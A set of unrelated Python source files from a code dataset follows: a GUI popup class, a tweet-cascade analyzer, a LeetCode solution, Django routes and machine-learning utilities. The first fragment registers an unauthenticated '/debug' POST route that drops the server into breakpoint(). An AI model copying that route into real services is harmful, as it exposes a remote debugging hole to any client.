"""A handler invoked by a client-side request to transfer control
of the server process to a debugger. This feature should be disabled
        unless admin authentication is in place.
Args:
request:
Returns:
"""
print('Running debug handler!')
breakpoint()
pass # A reminder that nothing is supposed to happen
return web.Response()
def setup_routes(self):
self.app.router.add_post('/feature', self.feature_post_handler)
self.app.router.add_get('/feature', self.feature_get_handler)
self.app.router.add_post('/project', self.project_post_handler)
self.app.router.add_post('/debug', self.debug_handler)
class LabberContext:
"""A context manager to wrap connections to Labber and capture errors
"""
def __enter__(self):
sys.stdout = sys.stderr = self.buff = StringIO()
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__ # restore I/O
if self._error():
raise ConnectionError
def _error(self) -> bool:
"""Checks if an error condition is found in temporary I/O buffer"""
return 'Error' in self.buff.getvalue()
| StarcoderdataPython |
1760258 | <filename>Python/FreiStat_GUI/PopUp_Window/__init__.py<gh_stars>0
"""
PopUp window class of the FreiStat interface.
"""
__author__ = "<NAME>"
__contact__ = "University of Freiburg, IMTEK, <NAME>"
__credits__ = "<NAME>"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>, <EMAIL>"
# Import dependencies
from tkinter import *
from tkinter.ttk import *
from FreiStat.Data_storage.constants import *
import FreiStat as FS
import FreiStat_GUI as FS_GUI
from numpy import var
# Import internal dependencies
from ..Data_Storage.constants import *
from ..Data_Storage.dictionaries import *
from ..Data_Storage.data_handling import DataHandling
class FreiStatPopUp():
"""
Description
-----------
Class for implementing the PopUp windows of the FreiStat interface
"""
from .Events import _on_rightclick
from .Events import _on_rightclick_release
from .Events import _bound_MouseWheel
from .Events import _unbound_MouseWheel
from .Events import _onMouseWheel
from .Widgets import _clickCheckButton
from .Widgets import _clickExport
from .Widgets import _clickImport
from .Widgets import _clickSelect
def __init__(self, iCenterX : int, iCenterY : int) -> None:
"""
Description
-----------
Constructor of the class FreiStatPopUp.
"""
        # Initialize class variables
self._iCenterX = iCenterX
self._iCenterY = iCenterY
# Load image
self._logo = PhotoImage(file= __path__[0] +
"./../assets/logo/FreiStat.gif")
self._initWindow()
def _initWindow(self) -> None:
"""
Description
-----------
        Initialize the actual window
"""
# Create root window object
self._PopUpRoot = Toplevel()
self._PopUpRoot.withdraw()
self._PopUpRoot.protocol("WM_DELETE_WINDOW", self._on_Closing)
self._PopUpRoot.resizable(FALSE, FALSE)
# Set title of the window
self._PopUpRoot.title("FreiStat")
# Set logo of the window
self._PopUpRoot.tk.call('wm', 'iconphoto', self._PopUpRoot._w, self._logo)
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
def PopUp_Help(self) -> None:
"""
Description
-----------
Create a PopUp window for the help setting
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{2*PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("Help")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
self._TabControl = Notebook(self._PopUpRoot)
tab1 = Frame(self._TabControl)
tab2 = Frame(self._TabControl)
tab3 = Frame(self._TabControl)
tab4 = Frame(self._TabControl)
tab5 = Frame(self._TabControl)
self._TabControl.add(tab1, text = "General")
self._TabControl.add(tab2, text = "Single Mode")
self._TabControl.add(tab3, text = "Sequence Mode")
self._TabControl.add(tab4, text = "Templates")
self._TabControl.add(tab5, text = "Data Export")
self._TabControl.pack(expand = TRUE, fill ="both")
# General
for iIndex in range(len(dic_helpText[GENERAL])):
helpText = Label(tab1, text= dic_helpText[GENERAL][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Single Mode
for iIndex in range(len(dic_helpText[SINGLE_MODE])):
helpText = Label(tab2, text= dic_helpText[SINGLE_MODE][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Sequence Mode
for iIndex in range(len(dic_helpText[SEQUENCE_MODE])):
helpText = Label(tab3, text= dic_helpText[SEQUENCE_MODE][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Templates
for iIndex in range(len(dic_helpText[TEMPLATES])):
helpText = Label(tab4, text= dic_helpText[TEMPLATES][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Data Export
for iIndex in range(len(dic_helpText[DATA_EXPORT])):
helpText = Label(tab5, text= dic_helpText[DATA_EXPORT][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
def PopUp_About(self) -> None:
"""
Description
-----------
Create a PopUp window for the about setting
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("About")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
# Create frame information
fVersionFrame = Frame(self._PopUpRoot, style="fPopUp.TFrame")
fVersionFrame.pack(fill= 'both', side= TOP, expand= True)
self._TextLogo = PhotoImage(file= __path__[0] + "./../assets/logo/FreiStat.png")
self._TextLogo = self._TextLogo.subsample(4)
TextLogoFreiStat = Label(fVersionFrame, image= self._TextLogo,
style= "fLabelGeneralWhite.TLabel")
TextLogoFreiStat.pack(side= TOP, expand= FALSE, padx= 5, pady= 5)
# FreiStat-GUI
TextGeneral = Label(fVersionFrame, text= FS_GUI.__name__, width= 100,
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextGeneral.pack(side= TOP, padx= 5, pady= 5)
TextVersion = Label(fVersionFrame, width= 100,
text= "Version: {0}".format(FS_GUI.__version__),
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextVersion.pack(side= TOP, padx= 5, pady= 5)
# FreiStat-Framework
TextGeneral = Label(fVersionFrame, text= FS.__name__, width= 100,
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextGeneral.pack(side= TOP, padx= 5, pady= 5)
TextVersion = Label(fVersionFrame, width= 100,
text= "Version: {0}".format(FS.__version__),
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextVersion.pack(side= TOP, padx= 5, pady= 5)
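
    # Hedged usage sketch (assumes a Tk root window and the FreiStat ttk styles
    # are set up elsewhere in the GUI):
    #   popup = FreiStatPopUp(iCenterX=200, iCenterY=150)
    #   popup.PopUp_About()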
def PopUp_TemplateHandler(self,
iCommandID : int,
dataHandling : DataHandling,
listDataStorage : list,
strFilePath: str) -> None:
"""
Description
-----------
Create a PopUp window for handling template import/ export management
Parameters
----------
`iCommandID` : int
Integer indicating command (0 Import | 1 Export)
`dataHandling` : DataHandling
Reference to the dataHandling object
`listDataStorage` : list
List containing all loaded data storage objects
`strFilePath` : str
String containing the path to the import/ export location
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{1000}x{600}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("Template management")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
# Save reference to dataHandling object
self._dataHandling = dataHandling
# Save reference to imported dataStorage objects
self._listDataStorage = listDataStorage
# Create lists to hold IntVar references
self._tempList : list = []
self._templateList : list = []
# Create list to hold template frame reference
self._templateFrameList : list = []
self._buttonList : list = []
self._templateNameList : list = []
# Save import/ export path
self._strFilePath = strFilePath
# Create a canvas window
canvasFrame = Canvas(self._PopUpRoot, background= "gray95",
borderwidth= 0, highlightthickness= 0)
# Create a scrollbar
scrollbarCentral=Scrollbar(self._PopUpRoot, orient="vertical",
command= canvasFrame.yview)
scrollbarCentral.pack(side= RIGHT, fill= Y)
canvasFrame.pack(fill= "both", expand= True, side= TOP)
# Add scroll command to canvas
canvasFrame.configure(yscrollcommand= scrollbarCentral.set)
fMainFrame = Frame(canvasFrame, style="fPopUpTemplate.TFrame")
fMainFrame.pack(fill= "both", side= TOP, expand= True, padx= 1)
# Update windows to get correct size informations
canvasFrame.create_window((0,0), window= fMainFrame,
anchor= NW, width= 985, height= len(listDataStorage) * 500)
# Bind mousewheel scroll to frames
fMainFrame.bind("<Enter>", lambda event,
frame = fMainFrame, canvas = canvasFrame :
self._bound_MouseWheel(event, frame, canvas))
fMainFrame.bind("<Leave>", lambda event,
frame = canvasFrame : self._unbound_MouseWheel(event, frame))
# Loop over every data storage entry
for iIndex in range(len(listDataStorage)):
self._DisplayTemplate(fMainFrame, iIndex, False,
listDataStorage[iIndex].get_TemplateName(),
listDataStorage[iIndex].get_ExperimentType(),
listDataStorage[iIndex].get_ExperimentParameters())
fRibbonFrame = Frame(self._PopUpRoot, style="fMenuBand.TFrame",
relief= RAISED)
fRibbonFrame.pack(fill= "both", side= BOTTOM)
if (iCommandID == IMPORT_TEMPLATE):
ButtonContinue = Button(fRibbonFrame, text= "Import templates",
command= lambda : self._clickImport())
ButtonContinue.pack(side= RIGHT, padx = 5, pady= 5)
elif (iCommandID == EXPORT_TEMPLATE):
ButtonContinue = Button(fRibbonFrame, text= "Export templates",
command= lambda : self._clickExport())
ButtonContinue.pack(side= RIGHT, padx = 5, pady= 5)
def _DisplayTemplate(self, parentFrame : Frame,
index : int,
bRecursionCall : bool,
templateName : str,
experimentType : str,
experimentParameter : list) -> None:
"""
Description
-----------
Method to display template in popup window
Parameters
----------
`parentFrame` : Frame
Reference to frame in which the template should be shown
`index` : int
Index indicating the position of the template in the list
`bRecursionCall` : bool
Flag indicating if the method displayed is part of a sequence
`templateName` : str
Name of the template
`experimentType` : str
Experiment type used
`experimentParameter` : list
List containing the experiment parameters
"""
fTemplateFrame = Frame(parentFrame, style="fPopUp.TFrame")
fTemplateFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 5)
# Create subframe for general template information
fTemplateGeneralFrame = Frame(fTemplateFrame, style="fPopUp.TFrame")
fTemplateGeneralFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 1)
templateIntVar = IntVar()
if(not bRecursionCall):
# Checkbutton for expanding method parameters
ButtonTemplate = Checkbutton(fTemplateGeneralFrame, onvalue= True,
offvalue= False, style="fCheckButtonGeneral.TCheckbutton",
variable= templateIntVar, command= lambda index= index :
self._clickCheckButton(index))
ButtonTemplate.pack(side= LEFT, fill= Y, padx = 5, pady= 5)
self._templateList.append(templateIntVar)
else :
# Insert spacer element
fSpacerFrame = Frame(fTemplateGeneralFrame, style= "fPopUp.TFrame")
fSpacerFrame.pack(fill= Y, side= LEFT, expand= FALSE, padx= 15, pady= 5)
# Label for ec-method
TextMethodName= Label(fTemplateGeneralFrame,
text= experimentType,
width= TEXTBOX_WIDTH_SMALL, style= "fLabelGeneralWhiteSmallBold.TLabel")
TextMethodName.pack(side= LEFT, pady= 5)
# Label for displaying the template name
TextTemplate= Label(fTemplateGeneralFrame,
text= dic_parameters[TEMPLATE_NAME][0],
width= TEXTBOX_WIDTH_SMALL, style= "fLabelGeneralWhiteSmallBold.TLabel")
TextTemplate.pack(side= LEFT, padx= 5, pady= 5)
if(not bRecursionCall):
# Entry for the template name which is placed in separate frame
strTemplate = StringVar()
strTemplate.set(templateName)
fBorderFrameEntry = Frame(fTemplateGeneralFrame, style="fPopUpSunken.TFrame")
fBorderFrameEntry.pack(fill= 'both', side= LEFT, pady= 5)
EntryTemplate = Entry(fBorderFrameEntry, textvariable= strTemplate,
width= TEXTBOX_WIDTH, style= "fLabelGeneralRedSmallBold.TLabel")
EntryTemplate.pack(side= LEFT, padx= 3)
self._templateNameList.append(strTemplate)
# Border frame for button
# (deprecated but can be used to give color frame to button)
fBorderFrameButton = Frame(fTemplateGeneralFrame, style="fPopUp.TFrame")
fBorderFrameButton.pack(fill= 'both', side= RIGHT, padx= 2, pady= 2)
ButtonShowExpPara = Button(fBorderFrameButton, text= "Show",
command= lambda index= index: self._clickSelect(index))
ButtonShowExpPara.pack(side= RIGHT, fill= Y, padx= 3, pady= 3)
self._buttonList.append([ButtonShowExpPara, False])
# Create subframe for display of experiment setup
fTemplateParameterFrame = Frame(fTemplateFrame, style="fWidget.TFrame")
self._templateFrameList.append(fTemplateParameterFrame)
else :
EntryTemplate = Label(fTemplateGeneralFrame, text= templateName,
width= TEXTBOX_WIDTH, style= "fLabelGeneralWhiteSmallBold.TLabel")
EntryTemplate.pack(side= LEFT, padx= 3, pady= 2)
fTemplateParameterFrame = Frame(fTemplateFrame, style="fWidget.TFrame")
fTemplateParameterFrame.pack(fill= "both", side= "top", padx= 1, pady= 5)
if (experimentType == SEQUENCE):
            # Make a recursive call for every method in the sequence
for iIndex in range(len(experimentParameter)):
self._DisplayTemplate(fTemplateParameterFrame, iIndex, True,
experimentParameter[iIndex][1],
experimentParameter[iIndex][0],
experimentParameter[iIndex][2])
else:
# Loop over all experiment parameters
for iIndex in range(len(experimentParameter)):
# Create a subsubframe for an experiment parameter pair
fParameterFrame = Frame(fTemplateParameterFrame, style="fPopUp.TFrame")
fParameterFrame.pack(fill= 'both', side= TOP, padx= 1)
# Label for displaying the name of the experiment parameter
TextParameter= Label(fParameterFrame,
text= dic_parameters[experimentParameter[iIndex][0]][0],
width= TEXTBOX_WIDTH, style= "fLabelGeneralWhiteSmall.TLabel")
TextParameter.pack(side= LEFT, padx= 35, pady= 5)
# Create suiting representation for every parameter
if (experimentParameter[iIndex][0] in
{MAINS_FILTER, ENABLE_OPTIMIZER, LOW_PERFORMANCE_MODE}):
tempIntVar = IntVar()
tempIntVar.set(experimentParameter[iIndex][1])
self._tempList.append(tempIntVar)
EntryParameter = Checkbutton(fParameterFrame, state= DISABLED,
style="fCheckButtonGeneral.TCheckbutton",
variable= tempIntVar, onvalue= True, offvalue= False )
EntryParameter.pack(side= LEFT, fill= Y, padx = 5, pady= 5)
else :
TextValue= Label(fParameterFrame, width= TEXTBOX_WIDTH,
text= str(experimentParameter[iIndex][1]),
style= "fLabelGeneralWhiteSmall.TLabel")
TextValue.pack(side= LEFT, padx= 5, pady= 5)
def PopUp_Tooltip(self, entry : str) -> None:
"""
Description
-----------
Create a PopUp window for the tool tip for every entry
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
self._PopUpRoot.overrideredirect(1)
# Create frame information
fTooltipFrame = Frame(self._PopUpRoot, style="fPopUp.TFrame")
fTooltipFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 1)
TextGeneral = Label(fTooltipFrame, text= dic_parameters[entry][1],
            width= PW_X_POSITION - 5, wraplength= PW_X_POSITION - 5,
style= "fLabelGeneralWhiteSmall.TLabel")
TextGeneral.pack(side= TOP, padx= 2, pady= 2)
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{TextGeneral.winfo_reqheight() + 6}+{self._PopUpRoot.winfo_pointerx() + 5}+{self._PopUpRoot.winfo_pointery() + 5}')
def _clearFrame(self, frame : Frame) -> None:
"""
Description
-----------
Helper method for clearing given frame of all widgets
Parameters
----------
`frame` : Frame
Frame which should be cleared
"""
# Get list of all widgets in the Frame
listWidget : list = frame.pack_slaves()
# Loop over all widgets
for widget in listWidget:
widget.destroy()
def _on_Closing(self):
"""
Description
-----------
On closing event for the popup window.
"""
self._PopUpRoot.withdraw() | StarcoderdataPython |
133204 | import sys
sys.path.append('..')
from utils import *
class Cascade:
# --------------------------
# Initiate Cascade
# --------------------------
def __init__(self, root_tweet_id, cascade_path, label=None):
self.file_id = root_tweet_id # For label.txt
self.root_tweet_id = root_tweet_id # Tweet ID with ROOT Keyword (May updated)
self.root_user_id = 0
self.cascade_path = cascade_path
self.label = label
self.network = nx.DiGraph()
self.load_cascade()
# -----------------
# Calculate Cascade
# -----------------
self.src_user_count = None
self.dst_user_count = None
self.avg_depth = 0
self.max_depth = 0
def load_cascade(self):
with open(self.cascade_path, 'r') as file:
# ---- -----------------
# Set Root: User, Tweet
# ---------------------
for index, line in enumerate(file):
elem_list = [x.strip() for x in re.split(r"[\'\,\->\[\]]", line.strip()) if x.strip()]
if elem_list[0] == 'ROOT' and elem_list[1] == 'ROOT':
self.root_user_id = elem_list[3]
if index != 0:
print('ROOT TWEET {} by {} @ line # {}'.format(elem_list[4], self.root_user_id, index))
break
if self.root_tweet_id != elem_list[4]: # Assert file_id == root_tweet_id
print('\t file_id:{1} -> root_tweet_id:{2} ({0}) '.format(self.label, self.root_tweet_id, elem_list[4]))
self.root_tweet_id = elem_list[4]
# ------------
# Load Cascade
# ------------
for index, line in enumerate(file): # Trace
elem_list = re.split(r"[\'\,\->\[\]]", line.strip())
elem_list = [x.strip() for x in elem_list if x.strip()] # Remove empty elements
                # Skip malformed rows where the destination timestamp does not follow the source
if float(elem_list[2]) >= float(elem_list[5]):
continue
src_user_id, src_tweet_id, src_tweet_time, dst_user_id, dst_tweet_id, dst_tweet_time = elem_list
weight = float(dst_tweet_time) - float(src_tweet_time)
self.network.add_weighted_edges_from([(src_user_id, dst_user_id, 1/weight)])
# =============================
# Structural Analysis
# =============================
def plot_circular_tree(self):
# import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
G = self.network
label = self.label
pos = graphviz_layout(G, prog='twopi', args='')
if label == 'true':
nc = 'blue'
elif label == 'false':
nc = 'red'
elif label == 'unverified':
nc = 'yellow'
elif label == 'non-rumor':
nc = 'green'
else:
nc = 'black'
nx.draw(G, pos, node_size=20, alpha=0.5, node_color=nc, with_labels=False)
out_dir_path = PLOTS_OUT_PATH + 'circular_tree_plot/'
ensure_directory(out_dir_path)
plt.savefig(out_dir_path + str(self.root_tweet_id) + ".png")
plt.clf()
def plot_diff_network(self):
from networkx.drawing.nx_agraph import graphviz_layout
G = self.network
label = self.label
# pos = graphviz_layout(G, prog='twopi', args='')
pos = nx.spring_layout(G, weight='weight')
if label == 'true':
nc = 'blue'
elif label == 'false':
nc = 'red'
elif label == 'unverified':
nc = 'yellow'
elif label == 'non-rumor':
nc = 'green'
else:
nc = 'black'
nx.draw(G, pos, node_size=20, alpha=0.5, node_color=nc, with_labels=False)
nx.draw_networkx_edge_labels(G, pos)
out_dir_path = PLOTS_OUT_PATH + 'diff_network_plot_2/'
ensure_directory(out_dir_path)
plt.savefig(out_dir_path + str(self.root_tweet_id) + ".png")
plt.clf()
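
    # Minimal sketch (not part of the original class) that fills the depth
    # statistics initialised in __init__; it assumes the root user id is a node
    # of the diffusion network.
    def compute_depth_stats(self):
        if self.root_user_id not in self.network:
            return
        depths = nx.shortest_path_length(self.network, source=self.root_user_id)
        depths = [d for d in depths.values() if d > 0]
        if depths:
            self.max_depth = max(depths)
            self.avg_depth = sum(depths) / len(depths)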
# TODO: Class Inheritance
class CascadeAnalyzer(object):
feature_df = pd.DataFrame() # output
def __init__(self):
self.meta_df = pd.DataFrame() # labels / key: root_tweet_id
self.cascades_dict = {} # key: root_tweet_id, value: Cascade()
self.retrieve_cascade_labels()
self.load_cascades()
def retrieve_cascade_labels(self):
column_names = ['label', 'tweet_id']
self.meta_df = pd.read_csv(DATA_PATH + "label.txt", sep=':', names=column_names, converters={'tweet_id': str})
print("-------------------------------------" * 2)
print(self.meta_df.shape, self.meta_df['label'].value_counts().to_dict())
print("-------------------------------------" * 2)
def load_cascades(self):
# TODO: handle pickle data
# iterate tweet trees
for index, file in enumerate(os.listdir(DATA_PATH + 'tree_u')):
if not file.endswith('.txt'):
print("Unexpected Input File:", file)
continue
root_tweet_id = file.replace('.txt', '') # file_id
cascade_path = os.path.join(DATA_PATH + 'tree_u', file)
label = self.meta_df.loc[self.meta_df['tweet_id'] == root_tweet_id, 'label'].item() # label
self.cascades_dict[root_tweet_id] = Cascade(root_tweet_id, cascade_path, label)
# Main Outer loop
def iterate_cascades(self):
for index, row in self.meta_df.iterrows():
tweet_id = row['tweet_id']
cascade = self.cascades_dict[tweet_id]
print('#', index, row['tweet_id'], row['label'])
# cascade.plot_circular_tree()
cascade.plot_diff_network()
def main():
# CascadeAnalyzer -> Overall / Cascade -> Individual
analyzer = CascadeAnalyzer()
analyzer.iterate_cascades()
# Rumor Diffusion Analysis Project
# https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-no_retweets-ids
print("===============================")
print(" Network Visualization ")
print("===============================\n\n")
if __name__ == '__main__':
start_time = time.time() # Timer Start
main()
print("\nElapsed Time: {0} seconds".format(round(time.time() - start_time, 3))) # Execution time
| StarcoderdataPython |
4809086 | <reponame>JulyKikuAkita/PythonPrac
__source__ = 'https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/kth-smallest-element-in-a-sorted-matrix.py
# Time: O(k * log(min(n, m, k))), with n x m matrix
# Space: O(min(n, m, k))
#
# Description: Leetcode # 378. Kth Smallest Element in a Sorted Matrix
#
# Given an n x n matrix where each of the rows and
# columns is sorted in ascending order,
# find the kth smallest element in the matrix.
#
# Note that it is the kth smallest element in the sorted order,
# not the kth distinct element.
#
# Example:
#
# matrix = [
# [ 1, 5, 9],
# [10, 11, 13],
# [12, 13, 15]
# ],
# k = 8,
#
# return 13.
# Note:
# You may assume k is always valid, 1 <= k <= n^2.
#
# Companies
# Google Twitter
# Related Topics
# Binary Search Heap
# Similar Questions
# Find K Pairs with Smallest Sums Kth Smallest Number in Multiplication Table
#
import unittest
from heapq import heappush, heappop
# 136ms 27.62%
class Solution(object):
def kthSmallest(self, matrix, k):
"""
:type matrix: List[List[int]]
:type k: int
:rtype: int
"""
kth_smallest = 0
min_heap = []
def push(i, j):
if len(matrix) > len(matrix[0]):
if i < len(matrix[0]) and j < len(matrix):
heappush(min_heap, [matrix[j][i], i, j])
else:
if i < len(matrix) and j < len(matrix[0]):
heappush(min_heap, [matrix[i][j], i, j])
push(0, 0)
while min_heap and k > 0:
kth_smallest, i, j = heappop(min_heap)
push(i, j + 1)
if j == 0:
push(i + 1, 0)
k -= 1
return kth_smallest
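
# Hedged sketch of the value-range binary search described in the notes below
# (Java "Solution 2"): binary search on [matrix[0][0], matrix[-1][-1]], counting
# entries <= mid with a staircase walk that starts at the top-right corner.
class SolutionBinarySearch(object):
    def kthSmallest(self, matrix, k):
        lo, hi = matrix[0][0], matrix[-1][-1]
        while lo < hi:
            mid = lo + (hi - lo) // 2
            count, j = 0, len(matrix[0]) - 1
            for row in matrix:
                while j >= 0 and row[j] > mid:
                    j -= 1
                count += j + 1
            if count < k:
                lo = mid + 1
            else:
                hi = mid
        return lo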
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
#
# https://discuss.leetcode.com/topic/52948/share-my-thoughts-and-clean-java-code
Solution 1 : Heap
Here is the step of my solution:
Build a minHeap of elements from the first row.
Do the following operations k-1 times :
Every time when you poll out the root(Top Element in Heap),
you need to know the row number and column number of that element(so we can create a tuple class here),
replace that root with the next element from the same column.
After you finish this problem, thinks more :
For this question, you can also build a min Heap from the first column, and do the similar operations as above.
(Replace the root with the next element from the same row)
What is more, this problem is exact the same with Leetcode373 Find K Pairs with Smallest Sums,
I use the same code which beats 96.42%, after you solve this problem, you can check with this link:
https://discuss.leetcode.com/topic/52953/share-my-solution-which-beat-96-42
# 24ms 41.99%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int n = matrix.length;
PriorityQueue<Tuple> pq = new PriorityQueue<Tuple>();
for (int j = 0; j <= n - 1; j++) {
pq.offer(new Tuple(0, j, matrix[0][j]));
}
for (int i = 0; i < k - 1; i++) {
Tuple t = pq.poll();
if (t.x == n - 1) continue;
pq.offer(new Tuple(t.x+1, t.y, matrix[t.x+1][t.y]));
}
return pq.poll().val;
}
class Tuple implements Comparable<Tuple> {
int x, y, val;
public Tuple(int x, int y, int val) {
this.x = x;
this.y = y;
this.val = val;
}
@Override
public int compareTo(Tuple that) {
return this.val - that.val; //minHeap
}
}
}
Solution 2 : Binary Search
We are done here, but let's think about this problem in another way:
The key point for any binary search is to figure out the "Search Space".
For me, I think there are two kind of "Search Space" --
index and range(the range from the smallest number to the biggest number).
Most usually, when the array is sorted in one direction,
we can use index as "search space",
when the array is unsorted and we are going to find a specific number, we can use "range".
Let me give you two examples of these two "search space"
index -- A bunch of examples -- https://leetcode.com/problems/find-minimum-in-rotated-sorted-array/
( the array is sorted)
range -- https://leetcode.com/problems/find-the-duplicate-number/ (Unsorted Array)
The reason why we did not use index as "search space" for this problem is that
the matrix is sorted in two directions, so we cannot find a linear way to map
a number to its index.
# 1ms 85.42%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int lo = matrix[0][0], hi = matrix[matrix.length - 1][matrix[0].length - 1] + 1;//[lo, hi)
while(lo < hi) {
int mid = lo + (hi - lo) / 2;
int count = 0, j = matrix[0].length - 1;
for(int i = 0; i < matrix.length; i++) {
while(j >= 0 && matrix[i][j] > mid) j--;
count += (j + 1);
}
if(count < k) lo = mid + 1;
else hi = mid;
}
return lo;
}
}
# 0ms 100%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int m = matrix.length;
int n = matrix[0].length;
int lower = matrix[0][0];
int upper = matrix[m-1][n-1];
while (lower < upper) {
int mid = lower + (upper - lower) / 2;
int count = count(matrix, mid);
if (count < k) {
lower = mid + 1;
} else {
upper = mid;
}
}
return upper;
}
public int count(int[][] matrix, int target) {
int count = 0;
int j = matrix[0].length - 1;
for (int i = 0; i < matrix.length; i++) {
while(j >= 0 && matrix[i][j] > target) j--;
count += (j + 1);
}
return count;
}
}
''' | StarcoderdataPython |
130588 | # urls.py
from __future__ import absolute_import
from django.conf.urls import include, url
from haystack.generic_views import SearchView
from haystack.forms import SearchForm
from .views import MySearchView
import cloud_notes.views
# required to set an app name to resolve 'url' in templates with namespacing
app_name = "cloud_notes"
urlpatterns = [
url(r'^$', cloud_notes.views.list),
url(r'^new/', cloud_notes.views.new_note),
url(r'^preview/(\d+)', cloud_notes.views.preview),
url(r'^edit/(\d+)', cloud_notes.views.edit_note),
url(r'^trash/(\d+)', cloud_notes.views.trash_note),
url(r'^empty_trash/', cloud_notes.views.empty_trash),
url(r'^delete/(\d+)', cloud_notes.views.delete_note),
url(r'^upload/', cloud_notes.views.upload_note),
url(r'^export/', cloud_notes.views.export),
url(r'^export_all/', cloud_notes.views.export_all),
url(r'^import/', cloud_notes.views.import_file),
url(r'^import_all/', cloud_notes.views.import_all),
url(r'^folders/', cloud_notes.views.folders),
url(r'^hash_tags/', cloud_notes.views.hash_tags),
url(r'^download/(\d+)', cloud_notes.views.download),
url(r'^search/', cloud_notes.views.MySearchView.as_view(form_class = SearchForm), name='search_view'),
]
| StarcoderdataPython |
4805296 | # -*- coding: utf-8 -*-
from flask_pymongo import PyMongo
mongo = PyMongo() | StarcoderdataPython |
1615755 | from running_modes.reinforcement_learning.configurations.learning_strategy_configuration import LearningStrategyConfiguration
from running_modes.reinforcement_learning.learning_strategy import BaseLearningStrategy
from running_modes.reinforcement_learning.learning_strategy import DAPStrategy
from running_modes.reinforcement_learning.learning_strategy import LearningStrategyEnum
from running_modes.reinforcement_learning.learning_strategy import MASCOFStrategy
from running_modes.reinforcement_learning.learning_strategy import MAULIStrategy
from running_modes.reinforcement_learning.learning_strategy import SDAPStrategy
class LearningStrategy:
def __new__(cls, critic_model, optimizer, configuration: LearningStrategyConfiguration, logger=None) \
-> BaseLearningStrategy:
learning_strategy_enum = LearningStrategyEnum()
if learning_strategy_enum.DAP == configuration.name:
return DAPStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.MAULI == configuration.name:
return MAULIStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.MASCOF == configuration.name:
return MASCOFStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.SDAP == configuration.name:
return SDAPStrategy(critic_model, optimizer, configuration, logger)
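
# Hedged usage note: configuration.name must match one of the LearningStrategyEnum
# values above, otherwise __new__ silently returns None.
#   strategy = LearningStrategy(critic_model, optimizer, configuration, logger)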
| StarcoderdataPython |
1623273 | import graphene
class AuthInfoField(graphene.ObjectType):
message = graphene.String()
| StarcoderdataPython |
3323274 | # Testing DPSS codes.
import multitaper.mtspec as mtspec
import multitaper.utils as utils
import numpy as np
import matplotlib.pyplot as plt
npts = 100
nw = 4.0
kspec = 7
dpss, v = utils.dpss2(npts,nw,kspec)
dpss1, v1 = utils.dpss(npts,nw,kspec)
print(v, v1)
plt.figure()
plt.plot(dpss[:,0],'k')
plt.plot(dpss[:,3],'k')
plt.plot(dpss[:,6],'k')
#plt.plot(dpss1,'r--')
plt.show()
| StarcoderdataPython |
1681209 | <reponame>vladdez/multilayer_perceptron
import numpy as np
import copy
class Optimizer:
def __init__(self, params, lr):
self.params = params
self.lr = lr
def action(self, iter_num):
raise NotImplementedError
class SGD(Optimizer):
def __init__(self, params, lr):
super().__init__(params, lr)
self.params = params
self.lr = lr
def action(self, iter_num):
for layer in self.params:
layer.weights -= self.lr * layer.w_grad
layer.biases -= self.lr * layer.b_grad
class Momentum(Optimizer):
def __init__(self, params, learning_rate):
super().__init__(params, learning_rate)
self.model_params = params
self.lr = learning_rate
self.momentum = 0.99
self.w_velocities = {i: np.zeros_like(self.model_params[i].weights) for i in
range(len(self.model_params))}
self.b_velocities = {i: np.zeros_like(self.model_params[i].biases) for i in
range(len(self.model_params))}
